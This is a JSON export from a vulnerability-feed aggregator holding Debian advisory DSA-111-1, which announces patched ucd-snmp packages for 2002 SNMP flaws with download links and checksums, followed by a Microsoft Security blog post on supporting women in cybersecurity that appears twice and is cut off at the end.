{"id": "DEBIAN:DSA-111-1:B73F2", "bulletinFamily": "unix", "title": "[SECURITY] [DSA-111-1] Multiple SNMP vulnerabilities", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-111-1 security@debian.org\nhttp://www.debian.org/security/ Wichert Akkerman\nFebruary 14, 2002\n- ------------------------------------------------------------------------\n\n\nPackage : ucd-snmp\nProblem type : remote exploit\nDebian-specific: no\nCERT Advisory : CA-2002-03\n\nThe Secure Programming Group of the Oulu University did a study on\nSNMP implementations and uncovered multiple problems which can\ncause problems ranging from Denial of Service attacks to remote\nexploits.\n\nNew UCD-SNMP packages have been prepared to fix these problems\nas well as a few others. The complete list of fixed problems is:\n\n* When running external programs snmpd used temporary files insecurely\n* snmpd did not properly reset supplementary groups after changing\n its uid and gid\n* Modified most code to use buffers instead of fixed-length strings to\n prevent buffer overflows\n* The ASN.1 parser did not check for negative lengths\n* the IFINDEX response handling in snmpnetstat did not do a sanity check\n on its input\n\n(thanks to Caldera for most of the work on those patches)\n\nThe new version is 4.1.1-2.1 and we recommend you upgrade your\nsnmp packages immediately.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Potato was released for alpha, arm, i386, m68k, powerpc and sparc.\n\n Source archives:\n http://security.debian.org/dists/stable/updates/main/source/ucd-snmp_4.1.1-2.1.diff.gz\n MD5 checksum: 96ef7f9946c3a10f100744fdc5482418\n http://security.debian.org/dists/stable/updates/main/source/ucd-snmp_4.1.1-2.1.dsc\n MD5 checksum: 03bc1ccf1a22e436a78c3e5a1ad4eefa\n http://security.debian.org/dists/stable/updates/main/source/ucd-snmp_4.1.1.orig.tar.gz\n MD5 checksum: 2f0d6130af510a8ce283dfdb557a85fa\n\n Alpha architecture:\n http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1-dev_4.1.1-2.1_alpha.deb\n MD5 checksum: e6cbb17f5295e4e663bee8369b2cf419\n http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1_4.1.1-2.1_alpha.deb\n MD5 checksum: 31c67fca601af32915020f5ce67f74cf\n http://security.debian.org/dists/stable/updates/main/binary-alpha/snmp_4.1.1-2.1_alpha.deb\n MD5 checksum: 0a82614ab42742528f9ebf13b8034410\n http://security.debian.org/dists/stable/updates/main/binary-alpha/snmpd_4.1.1-2.1_alpha.deb\n MD5 checksum: 205ab169948ac4c54665adb8dcaa8a67\n\n ARM architecture:\n http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1-dev_4.1.1-2.1_arm.deb\n MD5 checksum: ce4597a66d4bb6a816a859f2792cc62b\n http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1_4.1.1-2.1_arm.deb\n MD5 checksum: 9e96864263ab5f9489fcea655f1b0a50\n http://security.debian.org/dists/stable/updates/main/binary-arm/snmp_4.1.1-2.1_arm.deb\n MD5 checksum: 2c0361c50cf0f97a77439c0f9c834c17\n http://security.debian.org/dists/stable/updates/main/binary-arm/snmpd_4.1.1-2.1_arm.deb\n MD5 checksum: 48abd58e7399e245c3d3775ab59cbba3\n\n Intel IA-32 architecture:\n http://security.debian.org/dists/stable/updates/main/binary-i386/libsnmp4.1-dev_4.1.1-2.1_i386.deb\n MD5 checksum: 5addf966bc067f943b4ca6c7d604a48f\n http://security.debian.org/dists/stable/updates/main/binary-i386/libsnmp4.1_4.1.1-2.1_i386.deb\n MD5 checksum: e1ebaeaee18859d1e58aae658e4b1564\n http://security.debian.org/dists/stable/updates/main/binary-i386/snmp_4.1.1-2.1_i386.deb\n MD5 checksum: 7d13633a4e8a922eb36d6bfe8a04f0f3\n http://security.debian.org/dists/stable/updates/main/binary-i386/snmpd_4.1.1-2.1_i386.deb\n MD5 checksum: bb63f353a4e3bba6d0bd3acc54f6a138\n\n Motorola 680x0 architecture:\n http://security.debian.org/dists/stable/updates/main/binary-m68k/libsnmp4.1-dev_4.1.1-2.1_m68k.deb\n MD5 checksum: 805cc411f0b7d425275f60ef238773a4\n http://security.debian.org/dists/stable/updates/main/binary-m68k/libsnmp4.1_4.1.1-2.1_m68k.deb\n MD5 checksum: 021c14224b260e43276553329dc264f7\n http://security.debian.org/dists/stable/updates/main/binary-m68k/snmp_4.1.1-2.1_m68k.deb\n MD5 checksum: 5a8c55d92c6b721f3e1487ba858eb6e2\n http://security.debian.org/dists/stable/updates/main/binary-m68k/snmpd_4.1.1-2.1_m68k.deb\n MD5 checksum: 411834b9de92101366a7898f880d82eb\n\n PowerPC architecture:\n http://security.debian.org/dists/stable/updates/main/binary-powerpc/libsnmp4.1-dev_4.1.1-2.1_powerpc.deb\n MD5 checksum: a7dde01a21e7258b45285924dafd6b70\n http://security.debian.org/dists/stable/updates/main/binary-powerpc/libsnmp4.1_4.1.1-2.1_powerpc.deb\n MD5 checksum: a0e037e1fcebb2154fa1f41c65dfb0a8\n http://security.debian.org/dists/stable/updates/main/binary-powerpc/snmp_4.1.1-2.1_powerpc.deb\n MD5 checksum: 4510c8dbc86d1acc1fd31a2625b9ebc3\n http://security.debian.org/dists/stable/updates/main/binary-powerpc/snmpd_4.1.1-2.1_powerpc.deb\n MD5 checksum: 81acd0406d0166539d1fa61214fe7b59\n\n Sun Sparc architecture:\n http://security.debian.org/dists/stable/updates/main/binary-sparc/libsnmp4.1-dev_4.1.1-2.1_sparc.deb\n MD5 checksum: 098021d71b64d77622aaaa4ff0a7502c\n http://security.debian.org/dists/stable/updates/main/binary-sparc/libsnmp4.1_4.1.1-2.1_sparc.deb\n MD5 checksum: 1f5702918bfd3704abb82f72b4e9cfe8\n http://security.debian.org/dists/stable/updates/main/binary-sparc/snmp_4.1.1-2.1_sparc.deb\n MD5 checksum: e52aad9099ff709e94820b2bbbfd0ee1\n http://security.debian.org/dists/stable/updates/main/binary-sparc/snmpd_4.1.1-2.1_sparc.deb\n MD5 checksum: 813afcda0149f7a8c193b891320c14fa\n\n These packages will be moved into the stable distribution on its next\n revision.\n\n- -- \n- ----------------------------------------------------------------------------\napt-get: deb http://security.debian.org/ stable/updates main\ndpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\n\n", "published": "2002-02-14T00:00:00", "modified": "2002-02-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00020.html", "reporter": "Debian", "references": [], "cvelist": [], "type": "debian", "lastseen": "2018-10-16T22:14:54", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2018-10-16T22:14:54", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:1485"]}, {"type": "mssecure", "idList": ["MSSECURE:82D3580754DA96FD93831A7833D47D62"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:90DD0AABBC88137103AF5EBE0BC139D7"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-70929"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:04DFB64876C2018B4C8089BDBC359066"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0541-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:2480263761626163644"]}, {"type": "schneier", "idList": ["SCHNEIER:7771A7F05A95A96025A02D48BA85B7D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BCA35B2D5B3E7432E316ECDF7499D8CD", "TALOSBLOG:B6094C89CA7BC27EB70317743B95A344"]}, {"type": "cve", "idList": ["CVE-2020-11930", "CVE-2020-11928"]}, {"type": "ubuntu", "idList": ["USN-4331-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201503", "OPENVAS:1361412562311220201511", "OPENVAS:1361412562311220201506", "OPENVAS:1361412562310143735", "OPENVAS:1361412562310892181"]}, {"type": "exploitdb", "idList": ["EDB-ID:48348"]}], "modified": "2018-10-16T22:14:54", "rev": 2}, "vulnersScore": 4.7}, "affectedPackage": []}

{"mssecure": [{"lastseen": "2021-03-08T18:42:17", "bulletinFamily": "blog", "cvelist": [], "description": "Today, March 8, we are proud to celebrate International Women\u2019s Day. [The United Nations](<https://www.un.org/en/observances/womens-day>) announced this year\u2019s theme as \u201cWomen in leadership: Achieving an equal future in a COVID-19 world.\u201d As a woman, a mother, a daughter, a sister, a friend, and a leader at Microsoft, this is an important time to acknowledge and celebrate the strength and resiliency women have shown during this pandemic. Women fill many frontline positions, caring for us in health facilities, keeping us fed by staffing grocery stores, and delivering our packages. They teach our children remotely while caring for their own children. They are information workers, cybersecurity professionals, and leaders all around.\n\nThe impact of this crisis makes it more important than ever to prioritize the education, careers, well-being, and growth of women at work. We are proud to be a part of a company and security team at Microsoft that makes it a priority to invest in programs and initiatives that will help support the role of women in the workforce today and in the future so they can bring their best selves to work every single day.\n\nThat is why as a collective group of security women, we feel it is important to share a bit about these efforts, as well as some thoughts from fellow leaders across our security teams on how we can work together to recognize and build on women\u2019s achievements in cybersecurity.\n\n## New cybersecurity threats require diverse security perspectives\n\nIn addition to the personal impact it has had on so many, the pandemic has also threatened our cybersecurity community. With companies sending most of their employees home to work, cybercriminals have been eager to take advantage of new endpoints in their attempts to assess company systems. As well, phishing schemes have targeted people by mimicking pandemic healthcare alerts or unemployment information.\n\nThis increase in cybersecurity threats compounds the strain already placed on existing cyber defenders. With the cyber talent gap widening, we need more diverse cybersecurity professionals than ever to thwart them. Women make up just 24 percent of the cybersecurity workforce, according to the 2019 (ISC)\u00b2 report, [Cybersecurity Workforce Study: Women in Cybersecurity](<https://www.isc2.org/research/women-in-cybersecurity>). That imbalance is a big problem and during an online discussion called \u201cFuture Proofing Against Bias in Tech,\u201d participating women Microsoft leaders shared why. For one, gender-diverse teams make better business decisions 73 percent of the time, according to a [Cleverpop study](<https://www.cloverpop.com/hacking-diversity-with-inclusive-decision-making-white-paper?utm_campaign=Forbes&utm_source=Forbes&utm_medium=Forbes%20Hacking%20Diversity%20White%20Paper>) mentioned during the discussion.\n\nIt also is critical to catch cyber threats because limiting your hiring to only certain types of cybersecurity professionals can lead to biases and missed threat protection opportunities. And if there\u2019s one thing we know about cybercriminals, it\u2019s that they\u2019re very good at exploiting our biases.\n\n> Joy Chik, who is Microsoft Corporate Vice President for the Identity division shares, \u201cBuilding diverse cyber teams provides a strategic advantage. Diversity drives innovation and devalues group think. This helps to give us an edge in how we build our products, design our security programs, and respond to threats\u2014ultimately giving us an upper hand against cybercriminals who exploit our biases.\u201d\n\n## What\u2019s Microsoft Security doing to help?\n\nCybersecurity represents an exciting career opportunity for women, especially now with cyber threats on the rise against a backdrop of women disproportionately affected by job loss due to the pandemic. It raises the importance of opening up more opportunities for [women into higher-skilled professions, including technology](<https://blogs.microsoft.com/blog/2021/03/01/empowering-her-empowers-all-of-us/>). In response to the pandemic\u2019s severe impact on parts of the labor market, Microsoft launched its Global Skills Initiative to help 25 million people worldwide acquire digital skills and certifications to find new jobs. With our mission of **Security for all**, Microsoft Security is making it possible through our sponsorships and programs to making cybersecurity available to everyone\u2014as a professional option and as business protection against cyber threats.\n\nMicrosoft is partnering on several programs aimed at encouraging girls and women to consider careers in cybersecurity and expanding career opportunities for women. These programs include:\n\n * **Girls Go Cyberstart**: Launched in 2017, [this program](<https://girlsgocyberstart.org/>) aims to inspire and uncover future female talent by featuring a girls-only community in the national program CyberStart America. Female cybersecurity professionals at Microsoft have encouraged top high school Girls Go Cyberstart clubs by sharing how they got into security.\n * **WYiCyS**: Established in 2012, [this global community](<https://www.wicys.org/>) creates opportunities for women in cybersecurity through professional development programs, conferences, and career fairs.\n * **CyberShikshaa**: Launched in 2018 by Microsoft India and the Data Security Council of India, [this program](<https://www.dsci.in/cyber-shikshaa/>) is creating a pool of skilled female cybersecurity professionals.\n * **Microsoft Cybersecurity Professional Program**: Launched in 2018, [this program](<https://docs.microsoft.com/en-us/learn/?WT.mc_id=sitertzn_homepage_mslearn-redirect-mpp>) helps aspiring cybersecurity professionals, as well as late-stage career transformers, learn the necessary skills to start a career in cybersecurity. To date, we\u2019ve seen over 4,000 registrations, spanning a diverse range of ages and abilities.\n * [**DigiGirlz**](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>): [This program](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>) gives high school girls the chance to participate in hands-on computer and technology workshops, learn about careers in technology, and connect with Microsoft employees. We also help girls grow their skills and love for technology through our support of [TECHNOLOchicas](<https://technolochicas.org/>), [Black Girls CODE](<http://blackgirlscode.org/>), and [Girls Who Code](<https://girlswhocode.com/>).\n * **Microsoft Women in Security**: This long-running, company-wide initiative was started with the goal of building a strong internal community of female cyber professionals through programs, mentorships, and week-long events.\n * **Cybersecurity Converge Tour**: In partnership with organizations like the [Security Advisory Alliance (SAA)](<https://www.securityadvisoralliance.org/about/converge-tour/>), Microsoft hosted students in New York City for a \u201cCapture the Flag\u201d interactive education and mentorship event with the goal of creating 20,000 internship opportunities and increasing the number of women and minority security professionals. We\u2019ve also sponsored key events that support women like [Executive Women\u2019s Forum](<https://www.ewf-usa.com/>), [The Diana Initiative](<https://www.dianainitiative.org/>), and [Wicked 6 Cyber Games](<https://wicked6.com/>).\n\n## How to encourage more women in cybersecurity\n\nEncouraging more girls and women to get into cybersecurity creates more effective companies. It can also help reduce the world\u2019s shortage of qualified cybersecurity workers, which is expected to grow to 3.5 million in 2021.\n\nAs we look past the pandemic, we can expect that cybersecurity challenges will continue to evolve. AI, machine learning, and quantum computing will shape our response, but technology alone will not be enough. Some of our challenges can only be solved by people\u2014those with different backgrounds, ideas, and experiences. Women are such a crucial part of this. We must continually commit to supporting and empowering women leaders so that we can grow and educate the next generation of female cybersecurity superheroes.\n\nWe are so lucky to work with so many talented woman leaders across the security teams at Microsoft. Together we\u2019ve put together some tips on how we can all work to increase the number of women in cybersecurity.\n\n### 1\\. Commit to recruiting more women and retaining them\n\nNothing will change unless your organization commits to increasing its diversity. That starts at the top, with senior executives and other company leaders prioritizing a diverse workforce and asking themselves tough questions about why there are no women or very few women on their technology teams.\n\nWe believe the persistent gender gap in STEM starts early, so we must as well. A few years ago, a colleague\u2019s pre-teen daughter signed up for an after-school robotics class and when she arrived, saw only two girls in the room. Unfortunately, we\u2019re losing many girls from STEM before they are even out of middle school. We\u2019ve got to work harder to build curriculums that fit with their age and focus not just on the mechanics of coding but with more emphasis on creativity and real-world problem-solving. Giving them an opportunity to see the breadth of cybersecurity will encourage even our youngest future cyber warriors.\n\nOnce women are in those technology roles, it\u2019s just as important to prevent a talent drain. 52 percent of women leave technology fields\u2014nearly double the percentage of men who quit the technology field. In part, the problem can be attributed to women feeling stalled in their careers, with a [Center for Talent Innovation study](<https://www.talentinnovation.org/_private/assets/Athena-2-ExecSummFINAL-CTI.pdf>) finding that 27 percent of women in tech jobs feeling that way and 32 percent were considering quitting in the next year.\n\n### 2\\. Expand your definition of qualified candidates\n\nSome hiring managers may reject qualified women candidates because they don\u2019t fit a preconceived notion of a cybersecurity professional who checks all the expected boxes for age, gender, and race and has the technical skills, degrees, and certifications. This limited view causes companies to miss out on some incredible candidates.\n\nThe best cybersecurity professionals are insatiable learners and highly skilled problem-solvers. They may not work in cybersecurity or have a college degree but could become incredible assets to your organization.\n\nAccording to one of our Microsoft Cyber Defense Operations Center (CDOC) Directors in the [CISO Spotlight episode 7: People behind the cloud](<https://www.microsoft.com/en-us/videoplayer/embed/RE3QpDZ?autoplay=true>), \u201cWe want to bring in as many people of diverse backgrounds and skills as the problems we\u2019re trying to solve. I\u2019ve got university hires, military veterans, a mom who rides a motorcycle, people with advanced degrees, and just about everything in between. We do have some specialists who have done this for a really long time but we also get people who are coming in with a fresh perspective and they\u2019re looking at things in a different way.\u201d\n\n### 3\\. Educate and encourage women on cybersecurity and how to apply\n\nThere are opportunities for women at all levels in cybersecurity and the field is much wider than many imagine, encompassing roles in security products, cybercrime, compliance, privacy, and other related domains. According to Julie Brill, Microsoft\u2019s Chief Privacy Officer, women early in their careers or changing roles mid-career may underestimate their qualifications, in part because the industry may be sending the wrong message to women on the value they can add to an organization even in the early stages of their careers.\n\n> \u201cTalent comes from many places and doesn\u2019t require a decade of prior experience. Women who are earlier in their careers are more likely to be digital natives and facile with technology. This tech-savvy generation brings critical insight into how we can approach user-centric privacy features across our products. Enthusiastic women professionals can add value to the diverse teams that are working quickly to address the constantly changing cybersecurity and privacy landscape. We will always need innovative thinkers at any stage of their career who are passionate about the impact they can make for the tech industry and society overall. There is so much opportunity to pursue a career in privacy and cybersecurity, and there is plenty of work to be done.\u201d\u2014Julie Brill, Chief Privacy Officer at Microsoft\n\nGiven the potential, Microsoft Security is paving the way by sponsoring these cybersecurity programs listed in this blog. We believe it is important to educate mid-level school and high school students about these opportunities, coach them, and give them career guidance in addition to teaching security fundamentals. In the future, we will also collaborate and sponsor [Girl Security](<https://www.girlsecurity.org/>) with a fellowship program to provide career education and mentoring to people with diverse backgrounds\u2014enabling security to benefit all.\n\n### 4\\. Help candidates counter self-doubt\n\nImposter syndrome\u2014candidates entering high skills fields can often feel self-doubt, insecurity, and undeserving of their role. Help set the right tone from the outset by reassuring them that they don\u2019t need a perfect set of qualifications or an ideal background to become an amazing security engineer or cybercrime investigator.\n\nNo one was born with security knowledge and experience. People learn as they go along. As we\u2019ve heard from Kristina in the CISO Spotlight Episode, people of all different backgrounds make good security professionals.\n\n## Support women in cybersecurity\n\nThe work to develop programs and practices that attract and retain women in the field of cybersecurity is ongoing and moves as quickly as the field changes. In April, Microsoft Security is kicking off the [Girl Security](<https://www.girlsecurity.org/>) Fellowship program, a series of webcasts and training sessions that lead into the summer sharing inspiring stories from many of our women cybersecurity leaders and helping high school students learn security fundamentals along with mentorships. More information on the Microsoft and Girl Security program will be mentioned in a subsequent blog post later in March.\n\nBy embracing cybersecurity for all, we can both expand women\u2019s options in the workforce and more effectively secure companies against threats. Stay tuned for more blogs this month featuring our women leaders in Cybersecurity. Happy International Women\u2019s Day!\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nOther blogs to reference:\n\n * [CISO Spotlight: How diversity of data (and people) defeats today\u2019s cyber threats](<https://www.microsoft.com/security/blog/2020/10/20/ciso-spotlight-how-diversity-of-data-and-people-defeats-todays-cyber-threats/>).\n * [Microsoft Security: How to cultivate a diverse cybersecurity team](<https://www.microsoft.com/security/blog/2020/08/31/microsoft-security-cultivate-diverse-cybersecurity-team/>).\n * [New data from Microsoft shows how the pandemic is accelerating the digital transformation of cyber-security](<https://www.microsoft.com/security/blog/2020/08/19/microsoft-shows-pandemic-accelerating-transformation-cyber-security/>).\n * [Exploiting a crisis: How cybercriminals behaved during the outbreak](<https://www.microsoft.com/security/blog/2020/06/16/exploiting-a-crisis-how-cybercriminals-behaved-during-the-outbreak/>).\n\nThe post [International Women\u2019s Day: How to support and grow women in cybersecurity](<https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/>) appeared first on [Microsoft Security.", "modified": "2021-03-08T18:00:43", "published": "2021-03-08T18:00:43", "id": "MSSECURE:ECDE1A8DFB45A1210B46BCEB4EA6E96C", "href": "https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/", "type": "mssecure", "title": "International Women\u2019s Day: How to support and grow women in cybersecurity", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2021-03-08T18:02:03", "bulletinFamily": "blog", "cvelist": [], "description": "Today, March 8, we are proud to celebrate International Women\u2019s Day. [The United Nations](<https://www.un.org/en/observances/womens-day>) announced this year\u2019s theme as \u201cWomen in leadership: Achieving an equal future in a COVID-19 world.\u201d As a woman, a mother, a daughter, a sister, a friend, and a leader at Microsoft, this is an important time to acknowledge and celebrate the strength and resiliency women have shown during this pandemic. Women fill many frontline positions, caring for us in health facilities, keeping us fed by staffing grocery stores, and delivering our packages. They teach our children remotely while caring for their own children. They are information workers, cybersecurity professionals, and leaders all around.\n\nThe impact of this crisis makes it more important than ever to prioritize the education, careers, well-being, and growth of women at work. We are proud to be a part of a company and security team at Microsoft that makes it a priority to invest in programs and initiatives that will help support the role of women in the workforce today and in the future so they can bring their best selves to work every single day.\n\nThat is why as a collective group of security women, we feel it is important to share a bit about these efforts, as well as some thoughts from fellow leaders across our security teams on how we can work together to recognize and build on women\u2019s achievements in cybersecurity.\n\n## New cybersecurity threats require diverse security perspectives\n\nIn addition to the personal impact it has had on so many, the pandemic has also threatened our cybersecurity community. With companies sending most of their employees home to work, cybercriminals have been eager to take advantage of new endpoints in their attempts to assess company systems. As well, phishing schemes have targeted people by mimicking pandemic healthcare alerts or unemployment information.\n\nThis increase in cybersecurity threats compounds the strain already placed on existing cyber defenders. With the cyber talent gap widening, we need more diverse cybersecurity professionals than ever to thwart them. Women make up just 24 percent of the cybersecurity workforce, according to the 2019 (ISC)\u00b2 report, [Cybersecurity Workforce Study: Women in Cybersecurity](<https://www.isc2.org/research/women-in-cybersecurity>). That imbalance is a big problem and during an online discussion called \u201cFuture Proofing Against Bias in Tech,\u201d participating women Microsoft leaders shared why. For one, gender-diverse teams make better business decisions 73 percent of the time, according to a [Cleverpop study](<https://www.cloverpop.com/hacking-diversity-with-inclusive-decision-making-white-paper?utm_campaign=Forbes&utm_source=Forbes&utm_medium=Forbes%20Hacking%20Diversity%20White%20Paper>) mentioned during the discussion.\n\nIt also is critical to catch cyber threats because limiting your hiring to only certain types of cybersecurity professionals can lead to biases and missed threat protection opportunities. And if there\u2019s one thing we know about cybercriminals, it\u2019s that they\u2019re very good at exploiting our biases.\n\n> Joy Chik, who is Microsoft Corporate Vice President for the Identity division shares, \u201cBuilding diverse cyber teams provides a strategic advantage. Diversity drives innovation and devalues group think. This helps to give us an edge in how we build our products, design our security programs, and respond to threats\u2014ultimately giving us an upper hand against cybercriminals who exploit our biases.\u201d\n\n## What\u2019s Microsoft Security doing to help?\n\nCybersecurity represents an exciting career opportunity for women, especially now with cyber threats on the rise against a backdrop of women disproportionately affected by job loss due to the pandemic. It raises the importance of opening up more opportunities for [women into higher-skilled professions, including technology](<https://blogs.microsoft.com/blog/2021/03/01/empowering-her-empowers-all-of-us/>). In response to the pandemic\u2019s severe impact on parts of the labor market, Microsoft launched its Global Skills Initiative to help 25 million people worldwide acquire digital skills and certifications to find new jobs. With our mission of **Security for all**, Microsoft Security is making it possible through our sponsorships and programs to making cybersecurity available to everyone\u2014as a professional option and as business protection against cyber threats.\n\nMicrosoft is partnering on several programs aimed at encouraging girls and women to consider careers in cybersecurity and expanding career opportunities for women. These programs include:\n\n * **Girls Go Cyberstart**: Launched in 2017, [this program](<https://girlsgocyberstart.org/>) aims to inspire and uncover future female talent by featuring a girls-only community in the national program CyberStart America. Female cybersecurity professionals at Microsoft have encouraged top high school Girls Go Cyberstart clubs by sharing how they got into security.\n * **WYiCyS**: Established in 2012, [this global community](<https://www.wicys.org/>) creates opportunities for women in cybersecurity through professional development programs, conferences, and career fairs.\n * **CyberShikshaa**: Launched in 2018 by Microsoft India and the Data Security Council of India, [this program](<https://www.dsci.in/cyber-shikshaa/>) is creating a pool of skilled female cybersecurity professionals.\n * **Microsoft Cybersecurity Professional Program**: Launched in 2018, [this program](<https://docs.microsoft.com/en-us/learn/?WT.mc_id=sitertzn_homepage_mslearn-redirect-mpp>) helps aspiring cybersecurity professionals, as well as late-stage career transformers, learn the necessary skills to start a career in cybersecurity. To date, we\u2019ve seen over 4,000 registrations, spanning a diverse range of ages and abilities.\n * [**DigiGirlz**](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>): [This program](<https://www.microsoft.com/en-us/diversity/programs/digigirlz/default.aspx>) gives high school girls the chance to participate in hands-on computer and technology workshops, learn about careers in technology, and connect with Microsoft employees. We also help girls grow their skills and love for technology through our support of [TECHNOLOchicas](<https://technolochicas.org/>), [Black Girls CODE](<http://blackgirlscode.org/>), and [Girls Who Code](<https://girlswhocode.com/>).\n * **Microsoft Women in Security**: This long-running, company-wide initiative was started with the goal of building a strong internal community of female cyber professionals through programs, mentorships, and week-long events.\n * **Cybersecurity Converge Tour**: In partnership with organizations like the [Security Advisory Alliance (SAA)](<https://www.securityadvisoralliance.org/about/converge-tour/>), Microsoft hosted students in New York City for a \u201cCapture the Flag\u201d interactive education and mentorship event with the goal of creating 20,000 internship opportunities and increasing the number of women and minority security professionals. We\u2019ve also sponsored key events that support women like [Executive Women\u2019s Forum](<https://www.ewf-usa.com/>), [The Diana Initiative](<https://www.dianainitiative.org/>), and [Wicked 6 Cyber Games](<https://wicked6.com/>).\n\n## How to encourage more women in cybersecurity\n\nEncouraging more girls and women to get into cybersecurity creates more effective companies. It can also help reduce the world\u2019s shortage of qualified cybersecurity workers, which is expected to grow to 3.5 million in 2021.\n\nAs we look past the pandemic, we can expect that cybersecurity challenges will continue to evolve. AI, machine learning, and quantum computing will shape our response, but technology alone will not be enough. Some of our challenges can only be solved by people\u2014those with different backgrounds, ideas, and experiences. Women are such a crucial part of this. We must continually commit to supporting and empowering women leaders so that we can grow and educate the next generation of female cybersecurity superheroes.\n\nWe are so lucky to work with so many talented woman leaders across the security teams at Microsoft. Together we\u2019ve put together some tips on how we can all work to increase the number of women in cybersecurity.\n\n### 1\\. Commit to recruiting more women and retaining them\n\nNothing will change unless your organization commits to increasing its diversity. That starts at the top, with senior executives and other company leaders prioritizing a diverse workforce and asking themselves tough questions about why there are no women or very few women on their technology teams.\n\nWe believe the persistent gender gap in STEM starts early, so we must as well. A few years ago, a colleague\u2019s pre-teen daughter signed up for an after-school robotics class and when she arrived, saw only two girls in the room. Unfortunately, we\u2019re losing many girls from STEM before they are even out of middle school. We\u2019ve got to work harder to build curriculums that fit with their age and focus not just on the mechanics of coding but with more emphasis on creativity and real-world problem-solving. Giving them an opportunity to see the breadth of cybersecurity will encourage even our youngest future cyber warriors.\n\nOnce women are in those technology roles, it\u2019s just as important to prevent a talent drain. 52 percent of women leave technology fields\u2014nearly double the percentage of men who quit the technology field. In part, the problem can be attributed to women feeling stalled in their careers, with a [Center for Talent Innovation study](<https://www.talentinnovation.org/_private/assets/Athena-2-ExecSummFINAL-CTI.pdf>) finding that 27 percent of women in tech jobs feeling that way and 32 percent were considering quitting in the next year.\n\n### 2\\. Expand your definition of qualified candidates\n\nSome hiring managers may reject qualified women candidates because they don\u2019t fit a preconceived notion of a cybersecurity professional who checks all the expected boxes for age, gender, and race and has the technical skills, degrees, and certifications. This limited view causes companies to miss out on some incredible candidates.\n\nThe best cybersecurity professionals are insatiable learners and highly skilled problem-solvers. They may not work in cybersecurity or have a college degree but could become incredible assets to your organization.\n\nAccording to one of our Microsoft Cyber Defense Operations Center (CDOC) Directors in the [CISO Spotlight episode 7: People behind the cloud](<https://www.microsoft.com/en-us/videoplayer/embed/RE3QpDZ?autoplay=true>), \u201cWe want to bring in as many people of diverse backgrounds and skills as the problems we\u2019re trying to solve. I\u2019ve got university hires, military veterans, a mom who rides a motorcycle, people with advanced degrees, and just about everything in between. We do have some specialists who have done this for a really long time but we also get people who are coming in with a fresh perspective and they\u2019re looking at things in a different way.\u201d\n\n### 3\\. Educate and encourage women on cybersecurity and how to apply\n\nThere are opportunities for women at all levels in cybersecurity and the field is much wider than many imagine, encompassing roles in security products, cybercrime, compliance, privacy, and other related domains. According to Julie Brill, Microsoft\u2019s Chief Privacy Officer, women early in their careers or changing roles mid-career may underestimate their qualifications, in part because the industry may be sending the wrong message to women on the value they can add to an organization even in the early stages of their careers.\n\n> \u201cTalent comes from many places and doesn\u2019t require a decade of prior experience. Women who are earlier in their careers are more likely to be digital natives and facile with technology. This tech-savvy generation brings critical insight into how we can approach user-centric privacy features across our products. Enthusiastic women professionals can add value to the diverse teams that are working quickly to address the constantly changing cybersecurity and privacy landscape. We will always need innovative thinkers at any stage of their career who are passionate about the impact they can make for the tech industry and society overall. There is so much opportunity to pursue a career in privacy and cybersecurity, and there is plenty of work to be done.\u201d\u2014Julie Brill, Chief Privacy Officer at Microsoft\n\nGiven the potential, Microsoft Security is paving the way by sponsoring these cybersecurity programs listed in this blog. We believe it is important to educate mid-level school and high school students about these opportunities, coach them, and give them career guidance in addition to teaching security fundamentals. In the future, we will also collaborate and sponsor [Girl Security](<https://www.girlsecurity.org/>) with a fellowship program to provide career education and mentoring to people with diverse backgrounds\u2014enabling security to benefit all.\n\n### 4\\. Help candidates counter self-doubt\n\nImposter syndrome\u2014candidates entering high skills fields can often feel self-doubt, insecurity, and undeserving of their role. Help set the right tone from the outset by reassuring them that they don\u2019t need a perfect set of qualifications or an ideal background to become an amazing security engineer or cybercrime investigator.\n\nNo one was born with security knowledge and experience. People learn as they go along. As we\u2019ve heard from Kristina in the CISO Spotlight Episode, people of all different backgrounds make good security professionals.\n\n## Support women in cybersecurity\n\nThe work to develop programs and practices that attract and retain women in the field of cybersecurity is ongoing and moves as quickly as the field changes. In April, Microsoft Security is kicking off the [Girl Security](<https://www.girlsecurity.org/>) Fellowship program, a series of webcasts and training sessions that lead into the summer sharing inspiring stories from many of our women cybersecurity leaders and helping high school students learn security fundamentals along with mentorships. More information on the Microsoft and Girl Security program will be mentioned in a subsequent blog post later in March.\n\nBy embracing cybersecurity for all, we can both expand women\u2019s options in the workforce and more effectively secure companies against threats. Stay tuned for more blogs this month featuring our women leaders in Cybersecurity. Happy International Women\u2019s Day!\n\nTo learn more about 